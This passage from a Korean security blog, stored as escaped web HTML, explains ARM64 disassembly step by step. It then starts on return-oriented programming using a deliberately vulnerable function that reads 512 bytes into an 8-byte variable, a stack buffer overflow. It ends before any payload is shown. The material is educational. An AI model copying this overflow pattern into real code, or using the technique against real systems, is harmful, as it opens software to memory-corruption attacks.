\ub808\uc9c0\uc2a4\ud130\uc5d0 0x450000 \ud398\uc774\uc9c0 \uc8fc\uc18c\uac00 \uc800\uc7a5\ub418\uae30\uc5d0, x0 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 0x450000\uc774 \ub41c\ub2e4.<br>\uc5ec\uae30\uc11c ADD \uba85\ub839\uc5b4\uc5d0 \uc758\ud574 0x5c0 \uac12\uc774 \ub354\ud574\uc838, x0 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 0x4505c0\uc774 \ub41c\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\ucf54\ub4dc<\/h3>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"75\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_2-1024x75.png\" alt=\"\" class=\"wp-image-2596\" style=\"width:auto;height:30px\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_2-1024x75.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_2-300x22.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_2-768x56.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_2.png 1443w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400438 &lt;+28>:\tmov\tw1, #0x0<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\uc124\uba85<\/h3>\n\n\n\n<p>O_RDONLY\ub97c \uc758\ubbf8\ud558\ub294 1\uc774 w1 \ub808\uc9c0\uc2a4\ud130 \uac12\uc73c\ub85c \uc9c0\uc815\ub41c\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\ucf54\ub4dc<\/h3>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"74\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_3-1024x74.png\" alt=\"\" class=\"wp-image-2597\" style=\"width:auto;height:30px\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_3-1024x74.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_3-300x22.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_3-768x56.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_3.png 1448w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x000000000040043c &lt;+32>:\tbl\t0x418de0 &lt;open64><\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\uc124\uba85<\/h3>\n\n\n\n<p>open \ud568\uc218\ub97c \ud638\ucd9c\ud558\uae30 \uc704\ud574 BL \uba85\ub839\uc5b4\uc5d0 \uc758\ud574 \ubd84\uae30\ub41c\ub2e4.<\/p>\n\n\n\n<p>\uc5ec\uae30\uc11c \uc54c\uc544\uc57c\ub420 \uc810\uc740 \ub9e4\uac1c\ubcc0\uc218\uac00 \uccab \uc5ec\ub35f \uac1c\uae4c\uc9c0\ub294  <code>x0<\/code>\ubd80\ud130 <code>x7<\/code> \ub808\uc9c0\uc2a4\ud130\ub97c \ud1b5\ud574 \uc804\ub2ec\ub418\uace0, <br>\ucd94\uac00 \ub9e4\uac1c\ubcc0\uc218\ub294 \uc2a4\ud0dd\uc744 \ud1b5\ud574\uc11c \uc804\ub2ec\ub41c\ub2e4\uace0 \ud55c\ub2e4.<\/p>\n\n\n\n<p>\uc2e4\uc81c\ub85c, <br>x0\uc740 open \ud568\uc218\uc758 1\ubc88\uc9f8 \ub9e4\uac1c\ubcc0\uc218\ub85c\uc368 &#8220;.\/rop.data&#8221; \ubb38\uc790\uc5f4\uc744 \uac00\ub9ac\ud0a4\ub294 \uc8fc\uc18c\uac00 \ub2f4\uaca8\uc788\uc73c\uba70<br>x1\uc740 open \ud568\uc218\uc758 2\ubc88\uc9f8 \ub9e4\uac1c\ubcc0\uc218\ub85c\uc368 O_RDONLY\ub97c \uc758\ubbf8\ud558\ub294 1\uc774 \ub2f4\uaca8\uc788\ub2e4.<\/p>\n\n\n\n<p>\uadf8\ub807\uac8c open \ud568\uc218\uac00 \ud638\ucd9c\ub418\uace0\ub098\uc11c \ubcf5\uadc0\ud558\uba74, \uadf8 \ud568\uc218\uc758 \ub9ac\ud134\uac12\uc774 x0 \ub808\uc9c0\uc2a4\ud130\uac12\uc5d0 \uc800\uc7a5\ub41c\ub2e4. <br>(x86_64 \ud658\uacbd\uc5d0\uc11c\uc758 \ud568\uc218 \ub9ac\ud134\uac12\uc774 rax \ub808\uc9c0\uc2a4\ud130\ub85c \uc800\uc7a5\ub418\ub294 \uac83\uacfc \ube44\uc2b7\ud558\ub2e4.)<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>\ucf54\ub4dc<\/strong><\/h3>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"78\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_4-1024x78.png\" alt=\"\" class=\"wp-image-2600\" style=\"width:auto;height:30px\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_4-1024x78.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_4-300x23.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_4-768x59.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/fd_4.png 1443w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400440 &lt;+36>:\tstr\tw0, [x29, #44]<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"865\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc8-1024x865.png\" alt=\"\" class=\"wp-image-2601\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc8-1024x865.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc8-300x253.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc8-768x649.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc8-1536x1298.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc8-2048x1730.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\uc124\uba85<\/h3>\n\n\n\n<p>x29 \ud504\ub808\uc784\ud3ec\uc778\ud130\ub85c\ubd80\ud130 44\ubc14\uc774\ud2b8 \ub5a8\uc5b4\uc9c4 \uc704\uce58 (=fd)\uc5d0 <br>4\ubc14\uc774\ud2b8 \ud0c0\uc785\uc758 w0 \ub808\uc9c0\uc2a4\ud130\uac12\uc778 3 (=open \ub9ac\ud134\uac12)\uc744 \uc800\uc7a5\ud55c\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\ucf54\ub4dc<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">read(fd,&amp;u64,512);<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400444 &lt;+40>:\tadd\tx0, x29, #0x10\n0x0000000000400448 &lt;+44>:\tmov\tx2, #0x200\n0x000000000040044c &lt;+48>:\tmov\tx1, x0\n0x0000000000400450 &lt;+52>:\tldr\tw0, [x29, #44]\n0x0000000000400454 &lt;+56>:\tbl\t0x418fd8 &lt;read><\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc9-1024x768.png\" alt=\"\" class=\"wp-image-2604\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc9-1024x768.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc9-300x225.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc9-768x576.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc9-1536x1153.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc9-2048x1537.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\uc124\uba85<\/h3>\n\n\n\n<p><strong>add x0, x29, #0x10<\/strong><br>read \ud568\uc218\uc758 \ub9e4\uac1c\ubcc0\uc218\uc5d0 u64 \ubcc0\uc218\ub97c \uac00\ub9ac\ud0a4\uae30 \uc704\ud574 <br>x0 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 x29 \ud504\ub808\uc784\ud3ec\uc778\ud130 \uac12\uc5d0 16\uc744 \ub354\ud55c \uac12\uc774 \uc800\uc7a5\ub41c\ub2e4.<\/p>\n\n\n\n<p><strong>mov x2, #0x200<\/strong><br>read \ud568\uc218\uc758 3\ubc88\uc9f8 \ub9e4\uac1c\ubcc0\uc218\uc5d0 512\ub97c \ub123\uae30 \uc704\ud574<br>x2 \ub808\uc9c0\uc2a4\ud130 \uac12\uc740 512 \uac12\uc774 \uc800\uc7a5\ub41c\ub2e4.<\/p>\n\n\n\n<p><strong>mov x1, x0<\/strong><br>read \ud568\uc218\uc758 <strong>2\ubc88\uc9f8 \ub9e4\uac1c\ubcc0\uc218<\/strong>\uc5d0 u64 \ubcc0\uc218\ub97c \uac00\ub9ac\ud0a4\uae30 \uc704\ud574<br>x0 \ub808\uc9c0\uc2a4\ud130\uac12\uc744 x1 \ub808\uc9c0\uc2a4\ud130\ub85c \ubcf5\uc0ac\ud55c\ub2e4.<\/p>\n\n\n\n<p><strong>ldr w0, [x29, #44]<\/strong><br>ldr \uba85\ub839\uc5b4\ub294 load register\ub85c, \uba54\ubaa8\ub9ac\uc5d0\uc11c \uac12\uc744 \uc77d\uc5b4\uc640 \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc800\uc7a5\ud558\ub294 \uba85\ub839\uc5b4\uc774\ub2e4.<br>read \ud568\uc218\uc758 1\ubc88\uc9f8 \ub9e4\uac1c\ubcc0\uc218\uc5d0 fd \uac12\uc744 \ub123\uae30 \uc704\ud574 <br>x29 \ud504\ub808\uc784\ud3ec\uc778\ud130\uc5d0\uc11c +44\ubc14\uc774\ud2b8\ub9cc\ud07c \ub5a8\uc5b4\uc9c4 \uc704\uce58\uc5d0 \uc788\ub294 32\ube44\ud2b8 \uac12 (fd\uac12)\uc744 \uc77d\uc5b4\uc640\uc11c &#8216;w0&#8217; \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc800\uc7a5\ud55c\ub2e4.<\/p>\n\n\n\n<p><strong>bl 0x418fd8 &lt;read&gt;<\/strong><br>\ub9c8\ucc2c\uac00\uc9c0\ub85c x0, x1, x2 \ub9e4\uac1c\ubcc0\uc218\uc640 \ud568\uaed8 read \ud568\uc218\uac00 \ud638\ucd9c\ub418\uace0 \ub09c\ub4a4\uc5d0 <br>read \ub9ac\ud134 \uac12\uc774 x0 \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc800\uc7a5\ub418\uace0, x29+16 \uc9c0\uc810(u64)\uc5d0 read \ud568\uc218\ub97c \ud1b5\ud574 \uc77d\uc5b4\uc628 \ubc84\ud37c\uac00 \uc800\uc7a5\ub41c\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400458 &lt;+60>:\tnop<\/pre>\n<\/div><\/div>\n\n\n\n<p>\uc544\ubb34\ub7f0 \ub3d9\uc791\ub3c4 \ud558\uc9c0 \uc54a\ub294 \uba85\ub839\uc5b4\uc774\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\ucf54\ub4dc<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">}<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x000000000040045c &lt;+64>:\tldp\tx29, x30, [sp], #48<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"989\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc10-1-1024x989.png\" alt=\"\" class=\"wp-image-2613\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc10-1-1024x989.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc10-1-300x290.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc10-1-768x742.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc10-1-1536x1484.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc10-1-2048x1979.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\uc124\uba85<\/h3>\n\n\n\n<p><code>LDP<\/code> \uba85\ub839\uc5b4\ub294 &#8220;Load Pair&#8221;\ub85c, <br>\ub450 \uac1c\uc758 64\ube44\ud2b8 \ub808\uc9c0\uc2a4\ud130 \uac12\uc744 \uba54\ubaa8\ub9ac\uc5d0\uc11c \ud55c \uc30d\uc73c\ub85c \ub85c\ub4dc\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<p>\uba3c\uc800, \uc2a4\ud0dd\uc5d0\uc11c \ud504\ub808\uc784 \ud3ec\uc778\ud130 (<code>x29<\/code>)\uc640 \ub9c1\ud06c \ub808\uc9c0\uc2a4\ud130 (<code>x30<\/code>)(=lr) \uac12\uc744 sp+0, +8 \uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uc5ec <br>\uc774\uc804 \ud568\uc218 \ud638\ucd9c\uc758 \uc0c1\ud0dc\ub97c \ubcf5\uc6d0\ud55c\ub2e4.<\/p>\n\n\n\n<p>\ub610, \uc2a4\ud0dd \ud3ec\uc778\ud130 sp\ub97c +48 \uc99d\uac00\uc2dc\ucf1c, <br>rop_bad_func \ud568\uc218 \ud638\ucd9c \uc804\uc758 \uc2a4\ud0dd \ud3ec\uc778\ud130\uc758 \uc704\uce58\ub85c \ub418\ub3cc\ub9b0\ub2e4.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ret<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"797\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc11-1024x797.png\" alt=\"\" class=\"wp-image-2614\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc11-1024x797.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc11-300x234.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc11-768x598.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc11-1536x1196.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc11-2048x1594.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>RET \uba85\ub839\uc5b4\ub294 \ub0b4\ubd80\uc801\uc73c\ub85c \uc544\ub798\uc640 \uac19\uc774 \uc218\ud589\ub41c\ub2e4.<br><strong>mov pc, lr<\/strong><\/p>\n\n\n\n<p>lr (=x30) \ub808\uc9c0\uc2a4\ud130 \uac12\uc73c\ub85c pc \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc9c0\uc815\ud558\uc5ec<br>\ub2e4\uc2dc main \ud568\uc218\ub85c \ubcf5\uadc0\ud55c\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">\ucf54\ub4dc<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int main()\n{\n...\n\treturn 0;\n}<\/pre>\n<\/div><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\uc5b4\uc148\ube14\ub7ec<\/h3>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000400470 &lt;+12>:\tmov\tw0, #0x0\n0x0000000000400474 &lt;+16>:\tldp\tx29, x30, [sp], #16\n0x0000000000400478 &lt;+20>:\tret<\/pre>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"757\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc12-1024x757.png\" alt=\"\" class=\"wp-image-2615\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc12-1024x757.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc12-300x222.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc12-768x568.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc12-1536x1136.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc12-2048x1514.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\uc124\uba85<\/h2>\n\n\n\n<p>main \ud568\uc218\uc758 \uc5d0\ud544\ub85c\uadf8 \uc5ed\ud560\uc744 \ud55c\ub2e4.<\/p>\n\n\n\n<p><strong>mov w0, #0x0<\/strong><br>main \ud568\uc218\uc758 \ubc18\ud658 \uac12\uc774 0\uc774\uae30\uc5d0 w0 \ub808\uc9c0\uc2a4\ud130\uac12\uc744 0\uc73c\ub85c \uc9c0\uc815\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<p><strong>ldp x29, x30, [sp], #16<\/strong><br>\ub9c8\ucc2c\uac00\uc9c0\ub85c, \uba3c\uc800 \uc2a4\ud0dd\uc5d0\uc11c \ud504\ub808\uc784 \ud3ec\uc778\ud130 (<code>x29<\/code>)\uc640 \ub9c1\ud06c \ub808\uc9c0\uc2a4\ud130 (<code>x30<\/code>)(=lr) \uac12\uc744 sp+0, +8 \uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uc5ec <br>\uc774\uc804 \ud568\uc218 \ud638\ucd9c\uc758 \uc0c1\ud0dc\ub97c \ubcf5\uc6d0\ud55c\ub2e4.<br>\uadf8 \ub2e4\uc74c, \uc2a4\ud0dd \ud3ec\uc778\ud130 sp\ub97c +16 \uc99d\uac00\uc2dc\ucf1c, <br>main \ud568\uc218 \ud638\ucd9c \uc804\uc758 \uc2a4\ud0dd \ud3ec\uc778\ud130\uc758 \uc704\uce58\ub85c \ub418\ub3cc\ub9b0\ub2e4.<\/p>\n\n\n\n<p><strong>ret<\/strong><br>pc \ub808\uc9c0\uc2a4\ud130\uc5d0 lr (=x30) \ub808\uc9c0\uc2a4\ud130 \uac12\uc73c\ub85c \uc9c0\uc815\ud558\uc5ec<br>main \uc774\uc804 \ud568\uc218\ub85c \ubcf5\uadc0\ud55c\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">2. ROP \uacf5\uaca9 \uc774\ud574\ud558\uae30<\/h2>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">void rop_bad_func()\n{\n\tchar data[16] = {0}; \n\tunsigned long long u64 = 0; \n\tint fd = 0; \n\tfd = open(\".\/rop.data\",O_RDONLY); \n\tread(fd,&amp;u64,512);\n}<\/pre>\n<\/div><\/div>\n\n\n\n<p>\ubcf4\ub2e4\uc2dc\ud53c read \ud568\uc218\ub97c \ucf54\ub4dc\ub97c \ubcf4\uba74 \ud560\ub2f9\ub41c 8\ubc14\uc774\ud2b8 \ud06c\uae30\uc758 u64 \ubcc0\uc218\uc5d0 512\ubc14\uc774\ud2b8 \ub9cc\ud07c \uc785\ub825\ubc1b\uc744 \uc218 \uc788\uc5b4<br>\ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0 \ucde8\uc57d\uc810\uc774 \ubc1c\uc0dd\ud55c\ub2e4.<\/p>\n\n\n\n<p>rop.data \ud30c\uc77c\uc744 open, <br>read \ud568\uc218\uac00 \uc218\ud589\ub418\uace0 \ub09c \ub4a4\uc758 \uc2a4\ud0dd\uc744 \uc0b4\ud3b4\ubcf4\uba74 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"692\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc13-1024x692.png\" alt=\"\" class=\"wp-image-2618\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc13-1024x692.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc13-300x203.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc13-768x519.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc13-1536x1039.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc13-2048x1385.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\uc6b0\uc120\uc740 main \ud568\uc218\uac00 \ub05d\ub098\uace0 \ub098\uba74, 0x44f02c \uc8fc\uc18c\ub85c \ubcf5\uadc0\ud558\uac8c \ub41c\ub2e4.<br>0x44f02 \uc5b4\uc148\ube14\ub7ec \ucf54\ub4dc\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">...\n0x000000000044f02c &lt;+220>:\tldr\tx19, [sp, #16]\n0x000000000044f030 &lt;+224>:\tldp\tx29, x30, [sp], #48\n0x000000000044f034 &lt;+228>:\tret<\/pre>\n<\/div><\/div>\n\n\n\n<p>0x44f02 \uc8fc\uc18c\uc5d0 \ube0c\ub808\uc774\ud06c\ud3ec\uc778\ud2b8\ub97c \uac78\uace0, <br>\uc704 \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uac00 \uc2e4\ud589\ub418\uae30 \uc804\uc758 \uc2a4\ud0dd \uad6c\uc870\ub294 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"739\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc14-1024x739.png\" alt=\"\" class=\"wp-image-2621\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc14-1024x739.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc14-300x216.png 300w, 